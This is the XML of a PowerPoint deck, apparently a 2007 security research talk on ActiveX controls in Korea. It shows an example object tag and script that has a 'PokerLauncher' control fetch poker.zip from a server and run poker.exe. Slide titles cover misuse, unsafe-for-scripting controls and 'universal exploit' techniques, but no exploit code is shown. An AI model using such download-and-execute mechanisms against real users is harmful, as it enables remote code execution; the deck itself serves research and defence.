              <a:t>="PokerLauncher" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>classid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="……</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>PokerLauncher.StartGame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>("poker.exe");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/script&gt;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560354" y="2208995"/>
            <a:ext cx="2521844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l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;param name="Server" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      value="http://udate.server.com/"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custData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63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63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6395" grpId="1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슬라이드 번호 개체 틀 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4051300" y="7237413"/>
            <a:ext cx="2493963" cy="32385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1306" tIns="45654" rIns="91306" bIns="45654"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{61F403AD-CC9D-4D90-8084-2E41B926D5D0}" type="slidenum">
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:pPr latinLnBrk="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17411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ko-KR" dirty="0" smtClean="0"/>
              <a:t>ActiveX Control: Intended Scenario</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17412" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295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pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17414" name="Picture 10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gray">
          <a:xfrm>
            <a:off x="488916" y="1636713"/>
            <a:ext cx="2571750" cy="20701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sp>
        <p:nvSpPr>
          <p:cNvPr id="17415" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4275138" y="1779588"/>
            <a:ext cx="3600450" cy="720725"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd name="adj" fmla="val 33304"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="220073" tIns="52818" rIns="98082" bIns="49041" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="125413" indent="-125413" defTabSz="881063"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" noProof="1"/>
              <a:t>Request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" noProof="1" smtClean="0"/>
              <a:t>poker.zip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" noProof="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 2" descr="C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\j0285750.wm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904890" y="1637491"/>
            <a:ext cx="2942536" cy="2143140"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="그룹 12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2900129" y="1967812"/>
            <a:ext cx="1361942" cy="1741381"/>
            <a:chOff x="2900129" y="1967812"/>
            <a:chExt cx="1361942" cy="1741381"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="16" name="Picture 13" descr="C:\Documents and Settings\sweetlie\Local Settings\Temporary Internet Files\Content.IE5\NOBCR1O3\MCj02899620000[1].wmf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2905118" y="1967812"/>
              <a:ext cx="1356953" cy="16818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7" name="TextBox 12"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2900129" y="3432194"/>
              <a:ext cx="1303563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ko-KR" sz="1200" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>PokerLauncher</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="직사각형 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="488916" y="1993900"/>
            <a:ext cx="2928958" cy="1631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en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;object id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="PokerLauncher" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>classid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="……</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   &lt;param name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="Server" </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>update.server.com/"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>PokerLauncher.StartGame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>("poker.exe");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="20000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4247030" y="2917755"/>
            <a:ext cx="3600000" cy="720000"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd name="adj" fmla="val 33333"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
          <a:scene3d>
            <a:camera prst="orthographicFront">
              <a:rot lat="0" lon="10799999" rev="0"/>
            </a:camera>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="220073" tIns="52818" rIns="98082" bIns="49041" anchor="ctr">
            <a:flatTx/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="125413" indent="-125413" defTabSz="881063">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" noProof="1"/>
              <a:t>poker.zip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custData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74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5" grpId="2" animBg="1"/>
      <p:bldP spid="12" grpId="1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7.7|20.4|22.4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7.2|59.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|0.5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|1.2|0.9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80.4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04.5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2.3|5.3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1.8|5.5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4.2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4.5|4.7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6.7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8.3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9|8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7"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="제목슬라이드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제목슬라이드">
      <a:majorFont>
        <a:latin typeface="HY헤드라인M"/>
        <a:ea typeface="HY헤드라인M"/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial"/>
        <a:ea typeface="굴림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ko-KR" alt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굴림" pitchFamily="50" charset="-127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ko-KR" alt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굴림" pitchFamily="50" charset="-127"/>
          </a:defRPr>
        </a:defPPr>
      </a:lstStyle>
    </a:lnDef>
  </a:objectDefaults>
  <a:extraClrSchemeLst>
    <a:extraClrScheme>
      <a:clrScheme name="제목슬라이드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제목슬라이드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제목슬라이드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제목슬라이드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제목슬라이드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제목슬라이드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제목슬라이드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제목슬라이드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제목슬라이드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제목슬라이드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제목슬라이드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제목슬라이드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제목슬라이드 13">
        <a:dk1>
          <a:srgbClr val="000000"/>
        </a:dk1>
        <a:lt1>
          <a:srgbClr val="FFFFFF"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="FFFFFF"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="B2B2B2"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="306FCC"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="99CCFF"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="FFFFFF"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="000000"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="ADBBE2"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="8AB9E7"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="25A2AF"/>
        </a:hlink>
        <a:folHlink>
          <a:srgbClr val="6666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11615</TotalTime>
  <Words>2138</Words>
  <Application>Microsoft PowerPoint</Application>
  <PresentationFormat>사용자 지정</PresentationFormat>
  <Paragraphs>570</Paragraphs>
  <Slides>48</Slides>
  <Notes>48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48</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="49" baseType="lpstr">
      <vt:lpstr>제목슬라이드</vt:lpstr>
      <vt:lpstr>Playing with ActiveX Controls</vt:lpstr>
      <vt:lpstr>ActiveX Controls in Korea</vt:lpstr>
      <vt:lpstr>Typical Korean Users and ActiveX Controls</vt:lpstr>
      <vt:lpstr>Outline of This Talk</vt:lpstr>
      <vt:lpstr>1 Introduction to ActiveX Control</vt:lpstr>
      <vt:lpstr>ActiveX Control and Security</vt:lpstr>
      <vt:lpstr>ActiveX Control: Intended Scenario</vt:lpstr>
      <vt:lpstr>ActiveX Control: Intended Scenario</vt:lpstr>
      <vt:lpstr>ActiveX Control: Intended Scenario</vt:lpstr>
      <vt:lpstr>ActiveX Control: Intended Scenario</vt:lpstr>
      <vt:lpstr>Potential Misuse of ActiveX Control</vt:lpstr>
      <vt:lpstr>Potential Misuse of ActiveX Control</vt:lpstr>
      <vt:lpstr>Potential Misuse of ActiveX Control</vt:lpstr>
      <vt:lpstr>Potential Misuse of ActiveX Control</vt:lpstr>
      <vt:lpstr>Potential Misuse of ActiveX Control</vt:lpstr>
      <vt:lpstr>2 Potentially Vulnerable ActiveX Control Identification</vt:lpstr>
      <vt:lpstr>Potentially Vulnerable ActiveX Control</vt:lpstr>
      <vt:lpstr>IPersistPropertyBag and IPersistPropertyBag2 Interfaces</vt:lpstr>
      <vt:lpstr>Not Safe For Initialization</vt:lpstr>
      <vt:lpstr>Safe Initialization</vt:lpstr>
      <vt:lpstr>Procedure for  Potentially Vulnerable Control Identification</vt:lpstr>
      <vt:lpstr>IDispatch and IDispatchEx Interfaces</vt:lpstr>
      <vt:lpstr>Not Safe For Scripting</vt:lpstr>
      <vt:lpstr>Safe Scripting</vt:lpstr>
      <vt:lpstr>Procedure for  Potentially Vulnerable Control Identification</vt:lpstr>
      <vt:lpstr>YMFAC(You Must Fortify ActiveX Control)</vt:lpstr>
      <vt:lpstr>Automatic Generation of Test Web Pages</vt:lpstr>
      <vt:lpstr>Test Web Page</vt:lpstr>
      <vt:lpstr>3 DBCS and Universal Exploit Code</vt:lpstr>
      <vt:lpstr>Universal Exploit Code?</vt:lpstr>
      <vt:lpstr>DBCS (Double Byte Character Sets)</vt:lpstr>
      <vt:lpstr>Exploitation of Process Execution Vulnerability</vt:lpstr>
      <vt:lpstr>CreateBinaryFile.hta</vt:lpstr>
      <vt:lpstr>Ways to Create a Binary File using HTA</vt:lpstr>
      <vt:lpstr>http-equiv’s Method</vt:lpstr>
      <vt:lpstr>Problem in DBCS</vt:lpstr>
      <vt:lpstr>Universal Exploit to Create a Binary File</vt:lpstr>
      <vt:lpstr>4 Windows Vista and ActiveX Control</vt:lpstr>
      <vt:lpstr>ActiveX Control Capability Comparison Table</vt:lpstr>
      <vt:lpstr>Trusted sites zone</vt:lpstr>
      <vt:lpstr>Silent Execution of a Medium Integrity Process</vt:lpstr>
      <vt:lpstr>Intended Scenario Example</vt:lpstr>
      <vt:lpstr>Misused Scenario</vt:lpstr>
      <vt:lpstr>Potentially Vulnerable Scenarios</vt:lpstr>
      <vt:lpstr>5 Reference</vt:lpstr>
      <vt:lpstr>Reference(1/2)</vt:lpstr>
      <vt:lpstr>Reference(2/2)</vt:lpstr>
      <vt:lpstr>Q&amp;A Thank you!  Email : sweetlie@etri.re.kr</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>oo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oo</dc:creator>
  <cp:lastModifiedBy>hm</cp:lastModifiedBy>
  <cp:revision>897</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-06-12T00:01:45Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2007-04-20T03:01:50Z</dcterms:modified>
</cp:coreProperties>
</file>